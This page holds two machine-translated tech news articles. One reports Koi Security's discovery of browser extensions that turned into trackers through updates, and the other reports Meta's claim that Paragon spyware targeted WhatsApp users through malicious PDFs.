malicious

In Chrome and Edge there are extensions with thousands of positive valuations. Many are part of malicious campaigns

by

Many times we install extensions without thinking too much. They serve something concrete, they occupy little and are there when we need them. Some even have thousands of opinions, good assessment and years of presence in the store. Now we know that An investigation has uncovered that several of them hid a surveillance system capable of following our steps through the network. They were not obvious scams: they were useful, well -made tools and, above all, silent. The extension that uncovered the problem. “Picker color, Eyedropper – Geco Colorpick” was one of many useful extensions. Allowed to select colors from anywhere on the screen and worked well. More than 100,000 users had it installed, with positive valuations and verification seal included. In the eyes of anyone, there was no reason to distrust. According to Koi Security researchersfor a long time it was completely legitimate. Until it was not. In one of its updates, without warnings or visible changes for the user, the extension began to register pages visited and send that information to a remote server. It also maintained an active connection with a control infrastructure. It was just the beginning. When deepening in the case, the researchers detected common patterns in their code and behavior. What they found was a broader and more coordinated network that they baptized as ‘reddirection’. According to the report, at least 18 different extensions were part of this operation. All were available in Chrome and Edge stores, and together they accumulated more than 2.3 million facilities. Some were passed through productivity tools, others for entertainment profits. There were emojis keyboards, speed controllers for videos, time extensions, dark or supposed VPN issues to unlock services such as Tiktok or Discord. All with something in common: they offered a legitimate function … while spying in the background. What they did was not to install classic malware. These extensions implemented a browser kidnapping system that was activated every time the user opened a new tab or sailed to another page. The malicious code was hidden in the extent substance service and did not interfere with its main functionality. The mechanism worked like this: every time a website was loaded, the URL was sent to a remote server next to a unique user identifier. From there, the attackers could order an automatic redirection towards a false page or simply register the activity. Everything happened in the background, without alerts, without emerging windows, without visible failures. Extensions were not malicious from day. And that is what makes this campaign especially dangerous. According to the researchers, many of them spent months – or even more – offering their functionality without any suspicious behavior. Everything changed in an update. The technical team maintains that the malicious code was introduced into subsequent versions, when the extensions already had the confidence of thousands of users. And as browsers update automatically, the change was applied without anyone noticing. No one click was needed. Nor Social Engineering. Neither phishing. And the mechanisms designed to protect the user? Several of the malicious extensions were verified or appeared as highlighted on the Chrome and Edge platforms. Others accumulated positive reviews and a solid user base. All that contributed to the unnoticed when they changed their behavior. These are the extensions directly linked to the Reddirection campaign, according to the analysis carried out by Koi Security researchers. All of them offered apparently legitimate functions, but were identified as part of the same browser kidnapping scheme: PICKER COLOR, EYEDROPPER – GECO COLORPICK Emoji Keyboard Online – Copy & Paste Your Emoji Free Weather Forecast Weather Speed ​​Controller Video – Video Manager UNLOCK Discord – VPN Proxy to Unblock Discord Anywhere UNBLOCK TIKTOK-Seamless Access With One-Click Proxy Unlock YouTube VPN Dark Theme – Dark Reader for Chrome Volume Max – Ultimate Sound Booster Volume Booster – Increase Your Sound Web Sound Equalizer Flash Player – Games Emulator Header Value Unlock Tiktok Volume Booster Web Sound Equalizer Flash Player According to Bleeping Computersome of these extensions have already been removed from Chrome and Edge stores, but others are still available for discharge. Both Google and Microsoft have been notified by the Koi Security team, but for now they have not taken general measures on the complete set of extensions detected in the campaign. Images | Koi Security | Screen capture In Xataka | There is something that we are not doing enough and we should for our own security: eliminate old accounts

The objectives received malicious PDF files

by

For years, WhatsApp bets on advanced security characteristics. He end -to -end encryption It is one of the most relevant, designed so that only the participants of a conversation can see or listen to what is shared. But we should not confuse: although the application is presented as a strength, Its walls are not unwavering. The most recent example of this reality comes from the goal itself. As the Guardian collectsthe company led by Mark Zuckerberg has said that around 90 users of the popular messaging service, including journalists and civil society members, has been attacked and “probably committed” by a new directed malware campaign. WhatsApp, in the sight of a spy software firm Goal says that has interrupted the malicious operation That, according to its records, it was developed at the end of last year. In this regard, he adds that they have contacted the people who believe have been affected. It is not clear in which part of the world were the objectives or who were behind these attacks, but there are some interesting clues. The giant of social networks points against Paragon, a firm of Israeli origin that develops spy software with similarities to Pegasus de Nso Group. Their hypotheses seem solid, to the point that they have sent a letter of “cessation and withdrawal” to prevent the espionage firm from continuing to threaten the safety of its users. It is also exploring legal options. One of Paragon’s most prominent products is Graphite, who promises to avoid mobile phone safety barriers and, at best, obtain Total access to their dataincluding the ability to access application messages whose contents are encrypted as WhatsApp. Paragon was acquired in December by an American firm. When we talk about directed attacks we are referring to malicious campaigns that point to the number of determined objectives, for example, the network of a company, an entity in particular or certain people. High profile objectives enter the scene. For example, Pegasus was used long ago To spy on Pedro Sánchez’s mobilePresident of the Spanish Government. Paragon or NSO Group customers are usually intelligence agencies, forces of order and others State -related agencies. But its use is not exempt from controversies. Some technology have taken measures beyond the technical. Goal and Apple They sued in the past to NSO Group to demand responsibilities on cases of directed surveillance. The American giant apparently does not know who is the “client” that Paragon software used against its WhatsApp users, but has managed to break down part of the attack methodology. Their researchers believe that the infection vector has been a malicious PDF file, which was sent to the objectives after they were added to a group. Images | H9images | Mika Baumeister In Xataka | The Depseek online version has been publicly exposing users’ chats, according to Wiz. This is what we know

Log In

Forgot password?

Forgot password?

Enter your account data and we will send you a link to reset your password.

Your password reset link appears to be invalid or expired.

Log in

Privacy Policy

Add to Collection

No Collections

Here you'll find all collections you've created before.